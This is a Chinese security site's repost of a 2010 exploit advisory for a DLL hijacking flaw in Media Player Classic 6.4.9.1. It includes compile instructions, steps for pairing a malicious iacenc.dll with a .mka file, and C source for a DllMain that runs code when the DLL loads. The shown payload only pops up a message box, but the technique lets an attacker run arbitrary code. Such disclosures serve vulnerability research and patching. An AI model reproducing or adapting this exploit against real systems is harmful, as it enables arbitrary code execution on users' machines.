首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Media Player Classic 6.4.9.1 (iacenc.dll) DLL Hijacking Exploit
来源:vfocus.net 作者: LiquidWorm 发布时间:2010-08-26  
/*

 Media Player Classic 6.4.9.1 (iacenc.dll) DLL Hijacking Exploit

 Vendor: Gabest
 Product Web Page: http://sourceforge.net/projects/guliverkli
 Affected Version: 6.4.9.1 (revision 73)

 Summary: Media Player Classic (MPC) is a compact media player for
 32-bit Microsoft Windows. The application mimics the look and feel
 of the old, lightweight Windows Media Player 6.4 but integrates
 most options and features found in modern media players. It and
 its forks are standard media players in the K-Lite Codec Pack and
 the Combined Community Codec Pack.

 Desc: Media Player Classic suffers from a dll hijacking vulnerability
 that enables the attacker to execute arbitrary code on a local
 level. The vulnerable extensions are .mka, .ra and .ram thru iacenc.dll
 library.

 ----
 gcc -shared -o iacenc.dll mplayerc.c

 Compile and rename to iacenc.dll, create a file test.mka or any of the
 above vulnerable extensions and put both files in same dir and execute.
 ----

 Tested on Microsoft Windows XP Professional SP3 (EN)



 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 liquidworm gmail com

 Zero Science Lab - http://www.zeroscience.mk


 25.08.2010

*/


#include <windows.h>

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

	switch (fdwReason)
	{
		case DLL_PROCESS_ATTACH:
		dll_mll();
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
		break;
	}

	return TRUE;
}

int dll_mll()
{
	MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Corel PHOTO-PAINT X3 v13.0.0.5
·Nullsoft Winamp 5.581 (wnaspi3
·CorelDRAW X3 v13.0.0.576 (crlr
·Google Earth v5.1.3535.3218 (q
·Adobe ExtendedScript Toolkit C
·Demon tool lite DLL Hijacking
·Adobe Extension Manager CS5 v5
·Mozilla Thunderbird DLL Hijack
·Autodesk AutoCAD 2007 dll Hija
·Microsoft Office PowerPoint 20
·wscript.exe (XP) DLL Hijacking
·Roxio MyDVD 9 DLL Hijacking Ex
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved